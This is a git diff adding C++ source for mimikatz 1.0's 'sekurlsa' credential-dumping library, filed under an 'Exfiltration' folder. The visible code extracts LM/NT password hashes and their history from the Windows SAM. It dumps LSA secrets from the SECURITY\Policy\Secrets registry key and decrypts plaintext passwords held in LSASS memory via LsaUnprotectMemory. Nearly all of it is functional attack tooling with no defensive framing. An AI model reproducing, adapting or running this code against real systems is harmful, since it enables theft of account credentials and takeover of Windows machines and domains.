+		mesInfos.UserComment = mod_text::stringOfSTRING(ptrAllInformations->UserComment); correctMe(mesInfos.AdminComment);
+		mesInfos.AdminComment = mod_text::stringOfSTRING(ptrAllInformations->AdminComment); correctMe(mesInfos.AdminComment);
+		mesInfos.AccountExpires = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires);
+		mesInfos.AccountExpires_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires, true);
+		mesInfos.WorkStations = mod_text::stringOfSTRING(ptrAllInformations->WorkStations);
+		mesInfos.HomeDirectory = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectory); correctMe(mesInfos.HomeDirectory);
+		mesInfos.HomeDirectoryDrive = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectoryDrive); correctMe(mesInfos.HomeDirectoryDrive);
+		mesInfos.ProfilePath = mod_text::stringOfSTRING(ptrAllInformations->ProfilePath); correctMe(mesInfos.ProfilePath);
+		mesInfos.ScriptPath = mod_text::stringOfSTRING(ptrAllInformations->ScriptPath); correctMe(mesInfos.ScriptPath);
+		mesInfos.LogonCount = ptrAllInformations->LogonCount;
+		mesInfos.BadPasswordCount = ptrAllInformations->BadPasswordCount;
+		mesInfos.LastLogon = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon);
+		mesInfos.LastLogon_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon, true);
+		mesInfos.LastLogoff = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff);
+		mesInfos.LastLogoff_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff, true);
+		mesInfos.PasswordLastSet = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet);
+		mesInfos.PasswordLastSet_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet, true);
+		mesInfos.isPasswordNotExpire = (ptrAllInformations->UserAccountControl & USER_DONT_EXPIRE_PASSWORD) != 0;
+		mesInfos.isPasswordNotRequired = (ptrAllInformations->UserAccountControl & USER_PASSWORD_NOT_REQUIRED) != 0;
+		mesInfos.isPasswordExpired = ptrAllInformations->PasswordExpired != 0;
+		mesInfos.PasswordCanChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange);
+		mesInfos.PasswordCanChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange, true);
+		mesInfos.PasswordMustChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange);
+		mesInfos.PasswordMustChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange, true);
+		mesInfos.LmPasswordPresent = ptrAllInformations->LmPasswordPresent != 0;
+		mesInfos.NtPasswordPresent = ptrAllInformations->NtPasswordPresent != 0;
+
+		if(mesInfos.LmPasswordPresent)
+			mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->LmOwfPassword.Buffer), ptrAllInformations->LmOwfPassword.Length);
+		if(mesInfos.NtPasswordPresent)
+			mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->NtOwfPassword.Buffer), ptrAllInformations->NtOwfPassword.Length);
+
+		break;
+	}
+	return mesInfos;
+}
+
+bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV)
+{
+	WUserAllInformation mesInfos;
+	mesInfos.DomaineName = domainName;
+	mesInfos.UserId = rid;
+
+	DWORD Context = 2, Type = 0, tailleBlob;
+	PWHashHistory pMesDatas = NULL;
+	bool sendOk = true;
+	
+	if(NT_SUCCESS(SamIGetPrivateData(handleUser, &Context, &Type, &tailleBlob, &pMesDatas)))
+	{
+		unsigned short nbEntrees = min(pMesDatas->histNTLMsize, pMesDatas->histLMsize) / 16;
+
+		for(unsigned short i = 1; i < nbEntrees && sendOk; i++)
+		{
+			BYTE monBuff[16] = {0};
+
+			wostringstream userNameQualif;
+			userNameQualif << monUserName << L"{p-" << i << L"}";
+			mesInfos.UserName = userNameQualif.str();
+			
+			if(NT_SUCCESS(SystemFunction025(pMesDatas->hashs[nbEntrees + i], &rid, monBuff)))
+			{
+				mesInfos.LmPasswordPresent = 1;
+				mesInfos.LmOwfPassword = mod_text::stringOfHex(monBuff, 0x10);
+			}
+			else
+			{
+				mesInfos.LmPasswordPresent = 0;
+				mesInfos.LmOwfPassword = L"échec de décodage :(";
+			}
+
+			if(NT_SUCCESS(SystemFunction027(pMesDatas->hashs[i], &rid, monBuff)))
+			{
+				mesInfos.NtPasswordPresent = 1;
+				mesInfos.NtOwfPassword = mod_text::stringOfHex(monBuff, 0x10);
+			}
+			else
+			{
+				mesInfos.NtPasswordPresent = 0;
+				mesInfos.NtOwfPassword = L"échec de décodage :(";
+			}
+
+			sendOk = descrToPipeInformations(monPipe, type, mesInfos, isCSV);
+		}
+		LocalFree(pMesDatas);
+	}
+	return sendOk;
+}
+
+wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict)
+{
+	wostringstream reponse;
+
+	if(monInt.LowPart == ULONG_MAX && monInt.HighPart == LONG_MAX)
+	{
+		if(!isStrict)
+			reponse << L"N\'arrive jamais";
+	}
+	else if(monInt.LowPart == 0 && monInt.HighPart == 0)
+	{
+		if(!isStrict)
+			reponse << L"N\'est pas encore arrivé";
+	}
+	else
+	{
+		SYSTEMTIME monTimeStamp;
+		if(FileTimeToSystemTime(reinterpret_cast<PFILETIME>(&monInt), &monTimeStamp) != FALSE)
+		{
+			reponse << dec << 
+				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wDay << L"/" <<
+				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMonth << L"/" <<
+				setw(4)<< setfill(wchar_t('0')) << monTimeStamp.wYear << L" " <<
+				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wHour << L":" << 
+				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMinute << L":" << 
+				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wSecond;
+		}
+	}
+	return reponse.str();
+}
+
+wstring protectMe(wstring &maChaine)
+{
+	wstring result;
+	if(!maChaine.empty())
+	{
+		result = L"\"";
+		result.append(maChaine);
+		result.append(L"\"");
+	}
+	return result;
+}
+
+void correctMe(wstring &maChaine)
+{
+	unsigned char source[] = {0x19, 0x20, 0x13, 0x20, 0xab, 0x00, 0xbb, 0x00, 0x26, 0x20};
+	unsigned char replac[] = {'\'', 0   , '-' , 0   , '\"', 0   , '\"', 0,    '.',  0   };
+
+	for(unsigned int i = 0; i < maChaine.size() ; i++)
+	{
+		const BYTE * monPtr = reinterpret_cast<const BYTE *>(&maChaine.c_str()[i]);
+		for(int j = 0 ; j < min(sizeof(source), sizeof(replac)) ; j+=2)
+		{
+			if(*monPtr == source[j] && *(monPtr + 1) == source[j+1])
+			{
+				*const_cast<BYTE *>(monPtr) = replac[j];
+				*const_cast<BYTE *>(monPtr + 1) = replac[j + 1];
+				break;
+			}
+		}
+	}
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
new file mode 100644
index 0000000..870aa4d
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
@@ -0,0 +1,210 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "kmodel.h"
+#include "mod_text.h"
+#include <sstream>
+#include <iomanip>
+
+bool searchSAMFuncs();
+__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments);
+
+#define SAM_SERVER_CONNECT							0x00000001
+#define DOMAIN_ALL_ACCESS							0x000F07FF	
+#define USER_ALL_ACCESS								0x000F07FF	
+
+#define USER_ACCOUNT_DISABLED						0x00000001
+#define USER_PASSWORD_NOT_REQUIRED					0x00000004
+#define USER_NORMAL_ACCOUNT							0x00000010
+#define USER_WORKSTATION_TRUST_ACCOUNT				0x00000080
+#define USER_SERVER_TRUST_ACCOUNT					0x00000100
+#define USER_DONT_EXPIRE_PASSWORD					0x00000200
+#define USER_ACCOUNT_AUTO_LOCKED					0x00000400
+#define USER_SMARTCARD_REQUIRED						0x00001000
+#define USER_TRUSTED_FOR_DELEGATION					0x00002000
+#define USER_PASSWORD_EXPIRED						0x00020000
+
+typedef struct _WUserAllInformation
+{
+	unsigned long UserId;
+	wstring UserName;
+	wstring DomaineName;
+	wstring FullName;
+	bool isActif;
+	bool isLocked;
+	wstring TypeCompte;
+	wstring UserComment;
+	wstring AdminComment;
+	wstring AccountExpires;
+	wstring AccountExpires_strict;
+	wstring WorkStations;
+
+	wstring HomeDirectory;
+	wstring HomeDirectoryDrive;
+	wstring ProfilePath;
+	wstring ScriptPath;
+
+	unsigned short LogonCount;
+	unsigned short BadPasswordCount;
+	wstring LastLogon;
+	wstring LastLogon_strict;
+	wstring LastLogoff;
+	wstring LastLogoff_strict;
+
+	wstring PasswordLastSet;
+	wstring PasswordLastSet_strict;
+	bool isPasswordNotExpire;
+	bool isPasswordNotRequired;
+	bool isPasswordExpired;
+	wstring PasswordCanChange;
+	wstring PasswordCanChange_strict;
+	wstring PasswordMustChange;
+	wstring PasswordMustChange_strict;
+
+	bool LmPasswordPresent;
+	wstring LmOwfPassword;
+	bool NtPasswordPresent;
+	wstring NtOwfPassword;
+} WUserAllInformation, *PUserAllInformation;
+
+typedef struct _WHashHistory
+{
+	DWORD unkVersion;
+	unsigned short currentLMsize;
+	unsigned short unkCurrentLMsize;
+	DWORD unkCurLM;
+	BYTE EncLMhash[16];
+
+	unsigned short currentNTLMsize;
+	unsigned short unkCurrentNTLMsize;
+	DWORD unkCurNTLM;
+	BYTE EncNTLMhash[16];
+	
+	unsigned short histLMsize;
+	unsigned short unkhistLMsize;
+	DWORD unkHistLM;
+
+	unsigned short histNTLMsize;
+	unsigned short unkhistNTLMsize;
+	DWORD unkHistNTLM;
+	BYTE hashs[24][16];
+} WHashHistory, *PWHashHistory;
+
+DECLARE_HANDLE(HUSER);
+DECLARE_HANDLE(HSAM);
+DECLARE_HANDLE(HDOMAIN);
+
+typedef struct _SAMPR_RID_ENUMERATION
+{
+	unsigned long RelativeId;
+	LSA_UNICODE_STRING Name;
+} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION;
+
+typedef struct _SAMPR_ENUMERATION_BUFFER
+{
+	unsigned long EntriesRead;
+	[size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer;
+} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER;
+
+typedef enum _USER_INFORMATION_CLASS
+{
+	UserInternal1Information = 18,
+	UserAllInformation = 21,
+} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS;
+
+typedef struct _ENCRYPTED_LM_OWF_PASSWORD
+{
+	BYTE data[16];
+} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD,  *PENCRYPTED_NT_OWF_PASSWORD;
+
+typedef struct _SAMPR_USER_INTERNAL1_INFORMATION
+{
+	ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword;
+	ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword;
+	unsigned char NtPasswordPresent;
+	unsigned char LmPasswordPresent;
+	unsigned char PasswordExpired;
+} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION;
+
+typedef struct _OLD_LARGE_INTEGER {
+	unsigned long LowPart;
+	long HighPart;
+} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER;
+
+typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR {
+	[range(0, 256 * 1024)] unsigned long Length;
+	[size_is(Length)] unsigned char* SecurityDescriptor;
+} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR;
+
+typedef struct _SAMPR_LOGON_HOURS {
+	unsigned short UnitsPerWeek;
+	[size_is(1260), length_is((UnitsPerWeek+7)/8)] 
+	unsigned char* LogonHours;
+} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS;
+
+typedef struct _SAMPR_USER_ALL_INFORMATION
+{
+	OLD_LARGE_INTEGER LastLogon;
+	OLD_LARGE_INTEGER LastLogoff;
+	OLD_LARGE_INTEGER PasswordLastSet;
+	OLD_LARGE_INTEGER AccountExpires;
+	OLD_LARGE_INTEGER PasswordCanChange;
+	OLD_LARGE_INTEGER PasswordMustChange;
+	LSA_UNICODE_STRING UserName;
+	LSA_UNICODE_STRING FullName;
+	LSA_UNICODE_STRING HomeDirectory;
+	LSA_UNICODE_STRING HomeDirectoryDrive;
+	LSA_UNICODE_STRING ScriptPath;
+	LSA_UNICODE_STRING ProfilePath;
+	LSA_UNICODE_STRING AdminComment;
+	LSA_UNICODE_STRING WorkStations;
+	LSA_UNICODE_STRING UserComment;
+	LSA_UNICODE_STRING Parameters;
+	LSA_UNICODE_STRING LmOwfPassword;
+	LSA_UNICODE_STRING NtOwfPassword;
+	LSA_UNICODE_STRING PrivateData;
+	SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor;
+	unsigned long UserId;
+	unsigned long PrimaryGroupId;
+	unsigned long UserAccountControl;
+	unsigned long WhichFields;
+	SAMPR_LOGON_HOURS LogonHours;
+	unsigned short BadPasswordCount;
+	unsigned short LogonCount;
+	unsigned short CountryCode;
+	unsigned short CodePage;
+	unsigned char LmPasswordPresent;
+	unsigned char NtPasswordPresent;
+	unsigned char PasswordExpired;
+	unsigned char PrivateDataSensitive;
+} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION;
+
+typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER	/* http://msdn.microsoft.com/en-us/library/cc211885.aspx */
+{
+	[case(UserInternal1Information)]
+	SAMPR_USER_INTERNAL1_INFORMATION Internal1;
+	[case(UserAllInformation)]
+    SAMPR_USER_ALL_INFORMATION All;
+} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER;
+
+WUserAllInformation	UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr);
+bool				descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false);
+bool				descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false);
+wstring				toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false);
+wstring				protectMe(wstring &maChaine);
+void				correctMe(wstring &maChaine);
+
+typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD);
+typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*);
+typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*);
+typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID);
+typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *);
+typedef HLOCAL   (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD);
+typedef HLOCAL   (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER);
+typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE);
+typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
new file mode 100644
index 0000000..06d8664
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
@@ -0,0 +1,99 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "secrets.h"
+
+PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL;
+PLSA_R_OPEN_SECRET LsarOpenSecret = NULL;
+PLSA_R_QUERY_SECRET LsarQuerySecret = NULL;
+PLSA_R_CLOSE LsarClose = NULL;
+
+bool searchSECFuncs()
+{
+	if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose))
+	{
+		if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
+		{
+			LsaIOpenPolicyTrusted	= reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted"));
+			LsarOpenSecret			= reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret"));
+			LsarQuerySecret			= reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret"));
+			LsarClose				= reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose"));
+		}
+		return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose);
+	}
+	else return true;
+}
+
+__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream monStream;
+	monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl <<
+		L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl <<
+		L"@LsarOpenSecret        = " << LsarOpenSecret << endl <<
+		L"@LsarQuerySecret       = " << LsarQuerySecret << endl <<
+		L"@LsarClose             = " << LsarClose << endl;
+	return sendTo(monPipe, monStream.str());
+}
+
+__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	if(searchSECFuncs())
+	{
+		bool sendOk = true;
+		wstring message;
+		LSA_HANDLE hPolicy;
+		
+		if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy)))
+		{
+			HKEY hKeysSecrets;
+			if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS)
+			{
+				DWORD nbKey, maxKeySize;
+				if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
+				{
+					for(DWORD i = 0; (i < nbKey) && sendOk; i++)
+					{
+						DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t);
+						LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]};
+						
+						if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
+						{
+							monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t));
+							message.assign(L"\nSecret     : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n');
+							
+							LSA_HANDLE hSecret;
+							if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret)))
+							{
+								LSA_SECRET * monSecret = NULL;
+								if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL)))
+								{
+									message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n');
+									LsaFreeMemory(monSecret);
+								}
+								else message.append(L"Erreur : Impossible de récupérer le secret\n");
+								LsarClose(&hSecret);
+							}
+							else message.append(L"Erreur : Impossible d\'ouvrir le secret\n");
+						}
+						delete[] monNomSecret.Buffer;
+						sendOk = sendTo(monPipe, message);
+					}
+					message.clear();
+				} else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n");
+				RegCloseKey(hKeysSecrets);
+			}
+			else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n");
+			LsarClose(&hPolicy);
+		}
+		else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n");
+		
+		if(!message.empty())
+			sendOk = sendTo(monPipe, message);
+		
+		return sendOk;
+	}
+	else return getSECFunctions(monPipe, mesArguments);
+}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h
new file mode 100644
index 0000000..cb74837
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h
@@ -0,0 +1,29 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "kmodel.h"
+#include "mod_text.h"
+#include <wincred.h>
+
+bool searchSECFuncs();
+__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments);
+
+#define	SECRET_SET_VALUE	0x00000001
+#define	SECRET_QUERY_VALUE	0x00000002
+
+typedef struct _LSA_SECRET
+{
+	DWORD		Length;
+	DWORD		MaximumLength;
+	wchar_t *	Buffer;
+} LSA_SECRET, *PLSA_SECRET;
+
+typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED)	(LSA_HANDLE * pHPolicy);
+typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET)			(LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret);
+typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET)			(LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime);
+typedef NTSTATUS (WINAPI * PLSA_R_CLOSE)				(LSA_HANDLE * pHandle);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp
new file mode 100644
index 0000000..1d07596
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp
@@ -0,0 +1,86 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "sekurlsa.h"
+PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable = NULL;
+
+__kextdll bool __cdecl getDescription(wstring * maDescription)
+{
+	maDescription->assign(L"SekurLSA : librairie de manipulation des données de sécurités dans LSASS\n");
+	return mod_system::getVersion(&mod_system::GLOB_Version);
+}
+
+bool searchLSAFuncs()
+{
+	if(!SeckPkgFunctionTable)
+	{
+		if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
+		{
+			struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")};
+			if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification)
+				mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true);
+		}
+	}
+	return (SeckPkgFunctionTable != NULL);
+}
+
+wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass)
+{
+	wstring password;
+	if(ptrPass->Buffer && (ptrPass->Length > 0))
+	{
+		BYTE * monPass = new BYTE[ptrPass->MaximumLength];
+		RtlCopyMemory(monPass, ptrPass->Buffer, ptrPass->MaximumLength);
+		SeckPkgFunctionTable->LsaUnprotectMemory(monPass, ptrPass->MaximumLength);
+		password.assign(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monPass), ptrPass->Length));
+		delete[] monPass;
+	}
+	return password;
+}
+
+bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders)
+{
+	bool sendOk = true;
+	PLUID sessions;
+	ULONG count;
+
+	if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions)))
+	{
+		for (ULONG i = 0; i < count && sendOk; i++)
+		{
+			PSECURITY_LOGON_SESSION_DATA sessionData = NULL;
+			if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData)))
+			{
+				if(sessionData->LogonType != Network)
+				{
+					wostringstream maPremiereReponse;
+					maPremiereReponse << endl <<
+						L"Authentification Id         : "	<< sessions[i].HighPart << L";" << sessions[i].LowPart << endl <<
+						L"Package d\'authentification  : "	<< mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl <<
+						L"Utilisateur principal       : "	<< mod_text::stringOfSTRING(sessionData->UserName) << endl <<
+						L"Domaine d\'authentification  : "	<< mod_text::stringOfSTRING(sessionData->LogonDomain) << endl;
+
+					sendOk = sendTo(monPipe, maPremiereReponse.str());
+
+					for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++)
+					{
+						wostringstream maSecondeReponse;
+						maSecondeReponse << L'\t' << monProvider->second << L" : \t";
+						sendOk = sendTo(monPipe, maSecondeReponse.str());
+						monProvider->first(&sessions[i], monPipe, mesArguments->empty());
+						sendOk = sendTo(monPipe, L"\n");
+					}
+				}
+				LsaFreeReturnBuffer(sessionData);
+			}
+			else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'obtenir les données de session\n");
+		}
+		LsaFreeReturnBuffer(sessions);
+	}
+	else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'énumerer les sessions courantes\n");
+
+	return sendOk;
+}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h
new file mode 100644
index 0000000..c36e173
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h
@@ -0,0 +1,23 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "kmodel.h"
+#include "secpkg.h"
+#include "mod_memory.h"
+#include "mod_system.h"
+#include "mod_text.h"
+#include "mod_process.h"
+
+extern PLSA_SECPKG_FUNCTION_TABLE	SeckPkgFunctionTable;
+
+bool searchLSAFuncs();
+__kextdll bool __cdecl getDescription(wstring * maDescription);
+
+typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
+bool		getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders);
+
+wstring		getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc
new file mode 100644
index 0000000..2243435
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj
new file mode 100644
index 0000000..dbea2a6
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
